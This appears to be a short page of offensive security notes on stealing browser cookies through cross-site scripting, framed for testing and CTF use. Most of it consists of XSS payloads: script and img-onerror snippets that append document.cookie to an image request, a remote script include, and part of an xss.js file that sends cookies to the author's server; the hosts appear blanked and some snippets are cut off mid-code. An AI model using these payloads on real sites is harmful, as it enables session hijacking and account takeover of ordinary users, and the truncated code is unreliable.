Stealing Cookies

Stealing cookies to obtain privileges is the fever dream of hackers looking to exploit cross-site scripting vulnerabilities.


Verification with alert()

This payload will pop an alert() box prior to sending the cookie. This can be usefuil for testing a cross-site scripting payload and verifying that it is grabbing the intended information. Once the alert() box closes, the cookie will be sent to the arbitrary server:

var i=new Image;

Exfiltrating cookies without alert()

After verifying that the parameter is susceptible to cross-site scripting, we can leverage the following payload to exfiltrate cookies silently:

<script>var i=new Image;i.src=""+document.cookie;</script>

CTF Only Payload

The following payload leverages the img tag rather then script and will call onerror() in a loop, ultimately filling up your server with cookies. I have found this can be life-saving in a CTF when things may not be working as the author originally intended:

<img src=x onerror=this.src=''+document.cookie;>

My Preferred Method

The way that I like to go about capturing cookies is submitting the following payload, calling back to a JavaScript file that I am host on a Python web server:

<script src=""></script>
"><script src=></script>

The xss.js file looks like the following, ultimately it is doing the same as the above payloads by grabbing and sending the cookies to my hosted web server:

function pwn() {
    var img = document.createElement("img");
    img.src = "" + document.cookie;

Capturing the Cookies

Unless you're in a CTF environment, I would highly recommend capturing the cookies on a local web server or controlled Burp collaborator instance. I'm not sure about you, but sending cookies to a random website seems like a bad idea to me. That being said, there are sites that exist such as requestbin to send the request to:<script>new Image().src=""+document.cookie;</script>


Last updated